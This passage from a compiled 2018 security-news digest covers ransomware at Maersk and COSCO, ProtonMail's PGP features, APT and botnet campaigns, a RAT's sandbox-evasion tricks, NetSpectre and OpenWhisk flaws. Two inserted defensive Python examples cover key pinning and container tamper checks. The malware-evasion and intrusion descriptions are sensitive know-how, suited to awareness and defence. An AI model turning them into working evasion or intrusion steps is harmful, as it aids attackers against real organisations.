According to Maersk’s second-quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption” because it was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

ProtonMail launches Address Verification and full PGP support
28.7.2018 securityaffairs Crypto

Address Verification allows you to be sure you are securely communicating with the right person, while PGP support adds encrypted email interoperability.
Starting with the latest release of ProtonMail on web (v3.14), iOS and Android (v1.9), and the latest versions of the ProtonMail IMAP/SMTP Bridge, ProtonMail now supports Address Verification, along with full PGP interoperability and support. In this article, we’ll discuss these two new features in detail, and how they can dramatically improve email security and privacy.

Address Verification
When ProtonMail first launched in 2014, our goal was to make email encryption ubiquitous by making it easy enough for anybody to use. This is no easy feat, and that’s probably why it had never been done before. Our guiding philosophy is that the most secure systems in the world don’t actually benefit society if nobody can use them, and because of this, we made a number of design decisions for the sake of better usability.

One of these decisions was to make encryption key management automatic and invisible to the user. While this made it possible for millions of people around the world to start using encrypted email without any understanding of what an encryption key is, the resulting architecture required a certain level of trust in ProtonMail.

While a certain level of trust is always necessary when you use online services, our goal is to minimize the amount of trust required so that a compromise of ProtonMail doesn’t lead to a compromise of user communications. This is the philosophy behind our use of end-to-end encryption and zero-access encryption, and it is also the philosophy behind Address Verification.

Prior to the introduction of Address Verification, if ProtonMail was compromised, it would be possible to compromise user communications by sending the user a fake public encryption key. This could cause email communications to be encrypted in a way that an attacker, holding the corresponding fake private key, could intercept and decrypt the messages (this is also known as a Man-in-the-Middle attack, or MITM), despite the fact that the encryption takes place client side.

Address Verification provides an elegant solution to this problem. We consider this to be an advanced security feature and probably not necessary for the casual user, but as there are journalists and activists using ProtonMail for highly sensitive communications, we have made adding Address Verification a priority.

How Address Verification works
Address Verification works by leveraging the Encrypted Contacts feature that we released previously. Starting with the latest version of ProtonMail, when you receive a message from a ProtonMail contact, you now have the option (in the ProtonMail web app) to Trust Public Keys for this contact. Doing so saves the public key for this contact into the encrypted contacts, and as contacts data is not only encrypted, but also digitally signed, it is not possible to tamper with the public encryption key once it has been trusted.

This means that when sending emails to this contact, it is no longer possible for a malicious third party (even ProtonMail) to trick you into using a malicious public key that is different from the one you have trusted. This allows for a much higher level of security between two parties than is possible with any other encrypted email service. You can learn more about using Address Verification in our knowledge base article.

PGP Support
At the same time as Address Verification, we are also launching full support for PGP email encryption. As some of you may know, ProtonMail’s cryptography is already based upon PGP, and we maintain one of the world’s most widely used open source PGP libraries. PGP support is also an advanced feature that we don’t expect most users to use. If you need secure email, the easiest and most secure way to get it is still to get both you and your contact on ProtonMail, or if you are an enterprise, to migrate your business to ProtonMail.

However, for the many out there who still use PGP, the launch of full PGP support will make your life a lot easier. First, any ProtonMail user can now send PGP encrypted emails to non-ProtonMail users by importing the PGP public keys of those contacts. Second, it is also possible to receive PGP email at your ProtonMail account from any other PGP user in the world. You can now export your public key and share it with them.

Therefore, your ProtonMail account can in fact fully replace your existing PGP client. Instead of sharing your existing PGP public key, you can now share the PGP public key associated with your ProtonMail account and receive PGP encrypted emails directly in your ProtonMail account.

If you are an existing PGP user and you would like to keep your existing custom email address (e.g. john@mydomain.com), we’ve got you covered there, too. It is possible to move your email hosting to ProtonMail and import your existing PGP keys for your address, so you don’t need to share new keys and a new email address with your contacts.

If you are using PGP for sensitive purposes, this might actually be preferable to continuing to use your existing PGP client. For one, PGP is fully integrated into ProtonMail, encryption/decryption is fully automated, and the new Address Verification feature is used to protect you against MITM attacks. More importantly though, ProtonMail is not susceptible to the eFail class of vulnerabilities, which have impacted many PGP clients, and our PGP implementations are being actively maintained.

You can find more details about using PGP with ProtonMail here.

Introducing ProtonMail’s public key server
Finally, we are formally launching a public key server to make key discovery easier than ever. If your contact is already using ProtonMail, then key discovery is automatic (and you can use Address Verification to make it even more secure if you want). But if a non-ProtonMail user (like a PGP user) wants to email you securely at your ProtonMail account, they need a way to discover your public encryption key. If they don’t get it from your public profile or website, they are generally out of luck.

Our public key server solves this problem by providing a centralized place to look up the public key of any ProtonMail address (and non-ProtonMail addresses hosted at ProtonMail).

Our public key server can be found at hkps://api.protonmail.ch (note that this address is used for HKP requests and cannot be opened in a browser). However, if you want to download the public key of a ProtonMail user, simply replace “username@protonmail.com” with the address you’re looking for and paste the following link into your browser: https://api.protonmail.ch/pks/lookup?op=get&search=username@protonmail.com
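The key lookup above and the key pinning behind Address Verification, modelled together in one added example (my code, not ProtonMail's or OpenPGP.js): it builds the HKP lookup URL given on the page, checks the CRC-24 of the ASCII-armored key the server returns, and pins the trusted key so a different key offered later for the same address is flagged. The key bytes are constructed, and the SHA-256 "fingerprint" stands in for a real OpenPGP fingerprint.

```python
import base64
import hashlib
import re
from urllib.parse import urlencode

# Key server named on the page; the lookup path is the standard HKP one.
KEY_SERVER = "https://api.protonmail.ch"


def hkp_lookup_url(address: str, server: str = KEY_SERVER) -> str:
    """Build the HKP 'get' URL for an address (urlencode escapes '@' as %40)."""
    return f"{server}/pks/lookup?" + urlencode({"op": "get", "search": address})


def crc24(data: bytes) -> int:
    """CRC-24 used by OpenPGP ASCII armor (RFC 4880, section 6.1)."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


ARMOR_RE = re.compile(
    r"-----BEGIN PGP PUBLIC KEY BLOCK-----\r?\n"
    r"(?:[^\n]*:[^\n]*\r?\n)*"            # optional armor headers such as Version:
    r"\r?\n"                               # blank line ends the headers
    r"(?P<body>[A-Za-z0-9+/=\r\n]+?)"      # base64-encoded key packets
    r"\r?\n=(?P<crc>[A-Za-z0-9+/]{4})\r?\n"
    r"-----END PGP PUBLIC KEY BLOCK-----"
)


def dearmor_public_key(response_text: str) -> bytes:
    """Extract the binary key from an HKP response; reject bad armor or a CRC mismatch."""
    match = ARMOR_RE.search(response_text)
    if not match:
        raise ValueError("no PGP public key block in response")
    raw = base64.b64decode("".join(match.group("body").split()), validate=True)
    expected = int.from_bytes(base64.b64decode(match.group("crc")), "big")
    if crc24(raw) != expected:
        raise ValueError("armor checksum mismatch: key data corrupted or tampered")
    return raw


def armor_public_key(raw: bytes) -> str:
    """Inverse of dearmor_public_key; used here only to build constructed test input."""
    b64 = base64.b64encode(raw).decode()
    crc = base64.b64encode(crc24(raw).to_bytes(3, "big")).decode()
    return ("-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: constructed example\n\n"
            + "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
            + f"\n={crc}\n-----END PGP PUBLIC KEY BLOCK-----\n")


class TrustedKeys:
    """Address Verification in miniature: the key the user explicitly trusts for an
    address is pinned, and any different key offered later is a MITM signal.
    ProtonMail keeps the pin in signed, encrypted contact data; a dict stands in here."""

    def __init__(self):
        self._pins = {}

    @staticmethod
    def fingerprint(raw_key: bytes) -> str:
        # Simplification: a real OpenPGP fingerprint hashes the key packet (RFC 4880, 12.2);
        # SHA-256 over the whole blob is enough to notice a substituted key.
        return hashlib.sha256(raw_key).hexdigest()

    def trust(self, address: str, raw_key: bytes) -> None:
        self._pins[address] = self.fingerprint(raw_key)

    def check(self, address: str, raw_key: bytes) -> str:
        """'untrusted' (nothing pinned yet), 'ok' (matches the pin) or 'mismatch'."""
        pinned = self._pins.get(address)
        if pinned is None:
            return "untrusted"
        return "ok" if self.fingerprint(raw_key) == pinned else "mismatch"


if __name__ == "__main__":
    genuine = b"constructed-key-" + bytes(range(40))   # constructed, not a real OpenPGP key
    served = armor_public_key(genuine)                  # what the key server would return
    store = TrustedKeys()
    store.trust("alice@protonmail.com", dearmor_public_key(served))
    print(hkp_lookup_url("alice@protonmail.com"))
    print(store.check("alice@protonmail.com", genuine))           # ok
    print(store.check("alice@protonmail.com", genuine + b"!"))    # mismatch
```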

Concluding thoughts on open standards and federation
Today, ProtonMail is the world’s most widely used email encryption system, and for most of our users the addition of Address Verification and PGP support will not change how you use ProtonMail. In particular, setting up PGP (generating encryption keys, sharing them, and getting your contacts to do the same) is simply too complicated, and it is far easier for most people to simply create a ProtonMail account and benefit from end-to-end encryption and zero-access encryption without worrying about details like key management.

Still, launching PGP support is important to us. The beauty of email is that it is federated, meaning that anybody can implement it. It is not controlled by any single entity, it is not centralized, and there is not a single point of failure. While this does constrain email in many ways, it has also made email the most widespread and most successful communication system ever devised.

PGP, because it is built on top of email, is therefore also a federated encryption system. Unlike other encrypted communications systems, such as Signal or Telegram, PGP doesn’t belong to anybody, there is no single central server, and you aren’t forced to use one service over another. We believe encrypted communications should be open and not a walled garden. ProtonMail is now interoperable with practically ANY other past, present, or future email system that supports the OpenPGP standard, and our implementation of this standard is also itself open source.

ProtonMail PGP support

We still have a long way to go before we can make privacy accessible to everyone, and in the coming months and years we will be releasing many more features and products to make this possible. If you would like to support our mission, you can always donate or upgrade to a paid plan.

US-CERT warns of ongoing cyber attacks aimed at ERP applications
28.7.2018 securityaffairs Attack

US-CERT warns of cyber attacks on ERP applications, including Oracle and SAP, and refers to an interesting report published by Digital Shadows and Onapsis.
US-CERT warns of cyber attacks on Enterprise Resource Planning (ERP) solutions such as Oracle and SAP: both nation-state actors and cybercrime syndicates are carrying out hacking campaigns against these systems.
The report published by US-CERT references an analysis conducted by Digital Shadows and Onapsis, titled “ERP Applications Under Fire.”

“Digital Shadows Ltd. and Onapsis Inc. have released a report describing an increase in the exploitation of vulnerabilities in Enterprise Resource Planning (ERP) applications. ERP applications help organizations manage critical business processes—such as product lifecycle management, customer relationship management, and supply chain management.” reads the US-CERT bulletin.

“An attacker can exploit these vulnerabilities to obtain access to sensitive information.”

Unfortunately, an impressive number of systems are exposed online without the necessary security measures, and it is quite easy for attackers to find public exploits that could be used to hack them.

“The findings shed light into how nation-state actors, cybercriminals and hacktivist groups are actively attacking these applications and what organizations should do to mitigate this critical risk.” states the report.

“We observed detailed information on SAP hacking being exchanged at a major Russian-speaking criminal forum, as well as individuals interested in acquiring SAP HANA-specific exploits on the dark web. This goes in hand with an observed 100% increase of public exploits for SAP and Oracle ERP applications over the last three years, and a 160% increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.”

Below the key findings of the report:

Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.

The experts uncovered at least nine operations carried out by hacktivist groups that targeted ERP applications, including SAP and Oracle ERP. The attackers aimed at sabotaging the applications and compromising business-critical systems.

Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.

Malware authors have improved their code to target ERP applications to steal SAP user credentials and use them in cyber espionage campaigns.

Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.

Experts collected captured evidence of cyberattacks attributed to nation-state actors.

There has been a dramatic increase in the interest in exploits for SAP applications, including SAP HANA, in dark web and cybercriminal forums.

Experts observed a spike in the interest in exploits for SAP applications in the Dark Web.

Attack vectors are evolving, but still mainly leverage known ERP vulnerabilities rather than zero-days.

Threat actors continue to prefer well-known vulnerabilities over zero-day exploits for their attacks.

Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.

Researchers have identified more than 17,000 SAP and Oracle ERP applications exposed on the internet, most of them operated by the world’s largest commercial and government organizations.

ERP applications security report

“Many of these exposed systems run vulnerable versions and unprotected ERP components, which introduce a critical level of risk.” states the report.

Leaked information by third parties and employees can expose internal ERP applications.
Researchers discovered over 500 SAP configuration files on insecure file repositories exposed online, as well as employees sharing ERP login credentials in public forums. This kind of information is a precious gift for attackers.

Experts recommend that organizations carefully review configurations for known vulnerabilities, change default passwords and enforce strong passwords for users.

Leafminer cyber espionage group targets Middle East
28.7.2018 securityaffairs CyberSpy

Hackers belonging to an Iran-linked APT group tracked as ‘Leafminer’ have targeted government and various organizations in the Middle East.
An Iran-linked APT group tracked as ‘Leafminer’ has targeted governments and businesses in the Middle East.

According to the experts from Symantec, the Leafminer group has been active at least since early 2017.

“Symantec has uncovered the operations of a threat actor named Leafminer that is targeting a broad list of government organizations and business verticals in various regions in the Middle East since at least early 2017.” reads the analysis published by Symantec.

The experts detected malicious code and hacking tools associated with the cyber espionage group on 44 systems in Saudi Arabia, Lebanon, Israel, Kuwait and other countries.

The extent of the campaigns conducted by the group could be wider: the researchers uncovered a list, written in Farsi (Iran’s language), of 809 targets whose systems were scanned by the attackers.

The list groups the organizations of interest by geography and industry; it includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Most of the targets were in the financial, government and energy sectors.

Leafminer targets

The hackers used publicly available tools and custom malware in their attacks.

“On a broad level, it has followed the recent trend among targeted attack groups for “living off the land”—using a mixture of publicly available tools alongside its own custom malware.” continues the report.

“More specifically, it mimicked Dragonfly’s use of a watering hole to harvest network credentials. It also capitalized on the Shadow Brokers release of Inception Framework tools, making use of the leaked Fuzzbunch framework by developing its own exploit payloads for it.”

Researchers discovered that hackers used three main techniques for initial intrusion of target networks:

Compromised web servers used for watering hole attacks
Scans/exploits for vulnerabilities of network services
Dictionary attacks against logins of network services

While analyzing the attacks conducted by the group, the experts discovered a download URL for a malware payload used to compromise the victims. The URL pointed to a compromised web server on the domain e-qht[.]az that had been used to distribute Leafminer malware, payloads, and tools within the group and to make them available for download from victim machines.

“As of early June 2018, the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers. In addition to malware and tools, the served files also included uploads of log files seemingly originating from vulnerability scans and post-compromise tools.” continues the report.

“The web shell is a modification of the PhpSpy backdoor and references the author MagicCoder while linking to the (deleted) domain magiccoder.ir. Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army.”

Symantec discovered two custom malware families used by the Leafminer group, tracked as Trojan.Imecab and Backdoor.Sorgu: the former provides persistent access with a hardcoded password, the latter implements classic backdoor features.

The group also leveraged a modified version of the popular Mimikatz post-exploitation tool. To avoid detection, the group used a technique dubbed Process Doppelgänging, discovered in December 2017 by researchers from the security firm enSilo.

The technique is a fileless code injection method that exploits a built-in Windows function and an undocumented implementation of the Windows process loader.

“However, Leafminer’s eagerness to learn from others suggests some inexperience on the part of the attackers, a conclusion that’s supported by the group’s poor operational security. It made a major blunder in leaving a staging server publicly accessible, exposing the group’s entire arsenal of tools,” concludes Symantec.

Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution
28.7.2018 securityaffairs

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.
In 2015, Melvin (25) and Dennis van den B. (21) were arrested for their alleged involvement in the creation and distribution of the CoinVault ransomware; the case was heard by a district court in Rotterdam.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, making other people’s work inaccessible, and extorting 1,295 people.

“The court today sentenced two men to hack computers and then extort a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak statement.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years.”

CoinVault ransomware was first spotted in the wild in May 2014; it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

CoinVault ransomware
The two suspects are Dutch brothers and were identified with the help of experts from Kaspersky Lab thanks to their poor opsec. The experts from Kaspersky reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.” reported Kaspersky.

The two men, who have a clean criminal record, avoided jail by collaborating in the investigation conducted by the authorities. The court sentenced them to 240 hours of community service, which is the maximum term of community service a convicted person can be given.
The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

Ensure your system software and antivirus definitions are up-to-date.
Avoid visiting suspicious websites.
Regularly back up your important files to a separate drive or storage that is only temporarily connected.
Be on high alert for pop-ups, spam, and unexpected email attachments.

Parasite HTTP RAT implements a broad range of protections and evasion mechanisms
28.7.2018 securityaffairs

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.
The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulated environments. It first checks whether an exception handler has run, then it checks whether between 900ms and two seconds actually elapsed in response to the routine’s 1-second sleep, which is split into 10ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint.

In the presence of a sandbox, the RAT halts execution and attempts to hamper forensic investigation.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine why the malware did not run properly and crashed. ” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT.

The Parasite HTTP RAT is written in the C programming language. The author claims it has a small size (49kb) and no dependencies.

It also implements plugin support and dynamic API calls support.

Communication with the command and control (C&C) server is encrypted. The author also offers a series of plugins for the malware, including user management, browser password recovery, FTP password recovery, IM password recovery, email password recovery, Windows license key recovery, hidden VNC, and a reverse SOCKS5 proxy.

It is interesting to note that the malware uses a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT includes an obfuscated check for debugger breakpoints; it also removes hooks on a series of DLLs to complicate the work of malware analysts investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.

NetSpectre is a remote Spectre attack that allows stealing data over the network
28.7.2018 securityaffairs

Researchers discovered a new variant of the Spectre attack, dubbed NetSpectre, that allows an attacker to steal data over the network from the target system.
A group of researchers has devised a new variant of the Spectre attack, dubbed NetSpectre, that could allow an attacker to steal data over the network from the target system.

NetSpectre is described as a remote side-channel attack that, like Spectre variant 1 (CVE-2017-5753), exploits a flaw in the speculative execution mechanism. The technique could bypass address-space layout randomization on the remote system and allow the attackers to execute code on the vulnerable system.

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The researchers who discovered the NetSpectre attack explained that the technique leverages an AVX-based covert channel to capture data at the modest rate of 60 bits per hour from the target system.

“We present NetSpectre, a generic remote Spectre variant 1 attack.” reads the research paper.

“Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high performance AVX-based covert channel that we use in our cache-free Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system.”

An attacker could carry out the NetSpectre attack to read arbitrary memory from systems that have a network interface exposed on the network and that contain the required Spectre gadgets.

“As our NetSpectre attack is mounted over the network, the victim device requires a network interface an attacker can reach. The attacker must be able to send a large number of network packets to the victim,” continues the paper.

“Depending on the gadget location, the attacker has access to either the memory of the entire corresponding application or the entire kernel memory, typically including the entire system memory.” the researchers said.

An attacker just needs to send a series of specially crafted requests to the target machine and observe the timing difference in the network packet response time to leak a secret value from the machine’s memory.

“In contrast to local Spectre attacks, where a single measurement can already be sufficient, NetSpectre attacks require a large number of measurements to distinguish bits with a certain confidence” continues the paper.

The researchers reported the NetSpectre attack to Intel in March, and the tech giant addressed the issue with the first set of security patches it released.

Shipping Giant COSCO Hit by Ransomware
26.7.2018 securityweek

Chinese state-owned shipping and logistics company COSCO was reportedly hit by a piece of ransomware that disrupted some of its systems in the United States.

COSCO, one of the world’s largest shipping companies, described the incident as a “local network breakdown” in the Americas region. The firm says it has suspended connections with other regions while it conducts an investigation.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,” COSCO stated.

While COSCO’s statement does not mention a cyberattack, the company told some news outlets that the disruptions are the result of a ransomware attack.

Cosco responds to ransomware attack

According to researcher Kevin Beaumont‏, the impacted infrastructure hosts COSCO’s website (cosco-usa.com), phone and email systems, and WAN and VPN gateways. The expert pointed out that the company resorted to using Twitter and Yahoo email accounts to communicate with customers.

The company’s U.S. systems still appear to be offline at the time of writing. It’s unclear if this was a targeted attack or if COSCO’s systems became infected as part of an opportunistic ransomware campaign.

If COSCO was truly hit by ransomware – it’s not uncommon for companies to misclassify cyber threats in the initial phases of an investigation – it would not be the first time a major shipping company has fallen victim to this type of attack.

One of the victims of last year’s NotPetya campaign, which caused losses of hundreds of millions of dollars for several major companies, was Danish shipping giant A.P. Moller–Maersk, which revealed that the incident forced its IT team to reinstall software on its entire infrastructure, including 45,000 PCs and 4,000 servers.

As a result of the attack, Maersk employees had to manually process 80 percent of the work volume while systems were being restored and the incident cost the company over $300 million.

Hide ‘N Seek Botnet Targets Smart Homes
26.7.2018 securityweek BotNet

The infamous Hide ‘N Seek botnet is now targeting vulnerabilities in home automation solutions, network security firm Fortinet says.

First observed in January this year, the botnet originally targeted home routers and IP cameras, and had a decentralized, peer-to-peer architecture. By May, the malware had infected over 90,000 unique devices and was targeting far more device types and architectures.

Earlier this month, Qihoo 360's NetLab researchers revealed that the malware also included exploits for AVTECH webcams and Cisco Linksys routers, along with support for OrientDB and CouchDB database servers.

Fortinet now reports that the latest version of the malware has a configuration made up of 110 entries and 9 exploits. More importantly, Fortinet's security researchers reveal, Hide ‘N Seek has added an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability.

The malware implemented the exploit less than a week after it became public, and the same happened with the exploit for the Apache CouchDB remote code execution flaw, Fortinet reveals. The malware also targets a remote code execution vulnerability in Belkin NetCam devices.

HomeMatic is a line of smart home devices from the German manufacturer eQ-3. The botnet is targeting the system’s central element, which provides control, monitoring, and configuration options for all HomeMatic devices. This may be the moment when malware starts hacking your house.

“[Hide ‘N Seek] has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet notes.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits.

Apache OpenWhisk Flaws Allowed Attackers to Overwrite Code in IBM Cloud
26.7.2018 securityweek

Researchers discovered that two vulnerabilities in the Apache OpenWhisk serverless cloud platform could have allowed malicious actors to overwrite and execute arbitrary code.

Apache OpenWhisk is an open source platform designed to execute code in response to events. The platform handles infrastructure and servers so that users can focus on developing their applications.

IBM’s Cloud Functions function-as-a-service (FaaS) platform is based on Apache OpenWhisk, which made it vulnerable to attacks.

One of the vulnerabilities, tracked as CVE-2018-11757, was discovered by researchers at PureSec. Another issue, CVE-2018-11756, was identified during an investigation into CVE-2018-11757.

Both Apache OpenWhisk developers and IBM have created patches that should prevent attacks.

According to PureSec, the vulnerabilities could have allowed an attacker – under certain conditions – to overwrite the source code of a function being executed in a container and influence subsequent executions in the same container, even if they were carried out by a different user.

Successful exploitation of the vulnerabilities could have resulted in sensitive data getting leaked, or the execution of rogue logic in parallel to a legitimate action’s original logic.

“In addition, an attacker may launch similar attacks in parallel, and in turn affect additional containers, turning the attack into a more persistent or wide-spread threat,” PureSec explained.

Specifically, PureSec says an attacker could have exploited the flaws to obtain sensitive user data, such as passwords, modify or delete information, mine cryptocurrencies, or launch distributed denial-of-service (DDoS) attacks.

OpenWhisk runs each action (function) inside a Docker container and interaction with the function involves a REST interface accessible over port 8080. Each container has two endpoints: /init, which receives the code to be executed, and /run, which receives the arguments for the action and executes the code.

If an attacker could find a vulnerability in the function, such as a remote code execution flaw, they may have been able to force it to launch a local HTTP request to the /init interface on port 8080 and overwrite its source code.

PureSec has published a technical advisory, a blog post, and a video showing how an attack worked against IBM Cloud Functions.

“[PureSec] research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code,” said Rodric Rabbah, one of the creators of Apache OpenWhisk.

“The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits,” Rabbah added.
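A toy model of the container interface described above, added here as an illustration (my code, not OpenWhisk's runtime): it exposes the /init and /run endpoints and carries two mitigations of the kind the fix is described as providing, refusing a second /init and hashing the action source at /init so that an in-container overwrite is detected and reported at the next /run. The action code, file layout and warning texts are constructed for the example.

```python
import hashlib
import os
import tempfile


class ActionContainer:
    """Toy model of an OpenWhisk action container: /init receives the code,
    /run receives the arguments. Constructed for illustration; no sockets."""

    def __init__(self):
        self.workdir = tempfile.mkdtemp(prefix="action-")
        self.source_path = os.path.join(self.workdir, "action.py")
        self.source_hash = None   # recorded at /init, re-checked on every /run
        self.warnings = []        # what the runtime would log for the developer

    def handle(self, method, path, body):
        """Dispatch a request the way the container's HTTP interface on 8080 would."""
        if method != "POST":
            return 405, {"error": "method not allowed"}
        if path == "/init":
            return self._init(body)
        if path == "/run":
            return self._run(body)
        return 404, {"error": "not found"}

    def _init(self, body):
        # Hardening 1: a container is initialised once. A second /init can only
        # come from something already running inside (or able to reach) the container.
        if self.source_hash is not None:
            self.warnings.append("refused /init: container already initialized")
            return 403, {"error": "cannot initialize the action more than once"}
        code = body["value"]["code"]
        with open(self.source_path, "w") as f:
            f.write(code)
        self.source_hash = hashlib.sha256(code.encode()).hexdigest()
        return 200, {"ok": True}

    def _run(self, body):
        if self.source_hash is None:
            return 403, {"error": "not initialized"}
        with open(self.source_path) as f:
            code = f.read()
        # Hardening 2: the source on disk must still be what /init delivered.
        if hashlib.sha256(code.encode()).hexdigest() != self.source_hash:
            self.warnings.append("refused /run: action source changed since /init")
            return 403, {"error": "action source mutated inside the container"}
        namespace = {}
        exec(code, namespace)     # toy execution; a real runtime sandboxes this
        return 200, namespace["main"](body.get("value", {}))


def demo():
    """Drive the container through a normal call, a re-init attempt and an on-disk edit."""
    c = ActionContainer()
    code = "def main(args):\n    return {'greeting': 'hello ' + args.get('name', 'world')}\n"
    results = [c.handle("POST", "/init", {"value": {"code": code}})[0]]
    results.append(c.handle("POST", "/run", {"value": {"name": "alice"}}))
    results.append(c.handle("POST", "/init", {"value": {"code": "def main(args):\n    return {}\n"}})[0])
    with open(c.source_path, "w") as f:      # simulate an overwrite from inside the container
        f.write("def main(args):\n    return {'replaced': True}\n")
    results.append(c.handle("POST", "/run", {"value": {}})[0])
    return results, c.warnings


if __name__ == "__main__":
    print(demo())   # ([200, (200, {'greeting': 'hello alice'}), 403, 403], [...two warnings...])
```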

US, Australia Work to Improve Cyber Capabilities
26.7.2018 securityweek Cyber

The United States and Australia have signed an agreement that will enable the two allies to conduct research and development to advance their combined cyber capabilities, officials said Tuesday.

Nowhere "is the need for innovation more critical than in cyber, which continues to be a pervasive threat to our militaries and to our businesses," Australian Defence Minister Marise Payne said at a US-Australian summit in California.

US Defense Secretary Jim Mattis said the two countries had signed a memorandum of understanding "to deepen cybersecurity cooperation."

The move comes amid ongoing hacking thefts of sensitive information from military networks, and Russia's continued attempts to subvert democracy in America and elsewhere.

On a separate topic, an Australian reporter asked Mattis whether he thought the Australian navy should conduct a so-called "freedom of navigation" operation to challenge Chinese claims of sovereignty on militarized islets in the South China Sea.

The longstanding issue poses a dilemma for Canberra, with Australian lawmakers debating how much the country should align itself with its longstanding ally America, or pay more heed to the desires of China, its biggest trade partner.

"As far as freedom of navigation decisions by Australia, that's a sovereign decision by a sovereign state," Mattis said.

"We'll just leave that decision with the people of Australia, which is exactly where it belongs."

US Secretary of State Mike Pompeo and his Australian counterpart Julie Bishop also attended the annual summit.

Pompeo was asked about US views of holding Russia to account over its role in the 2014 shootdown of Malaysia Airlines flight MH-17 over Ukraine, when 298 people, including 38 Australian citizens and residents, were killed.

"We need the Russians to continue to be held accountable for that," Pompeo said.

"We take this matter seriously and we committed over these last two days, as we have for the last months, to continue to support every effort through the Joint Investigative Team to hold the perpetrators for this heinous activity accountable."

Customer Identity and Access Management Firm LoginRadius Raises $17 Million
26.7.2018 securityweek IT

Vancouver, Canada-based customer identity and access management (cIAM) firm LoginRadius has raised $17 million Series A funding led by ForgePoint Capital and Microsoft's venture fund, M12.

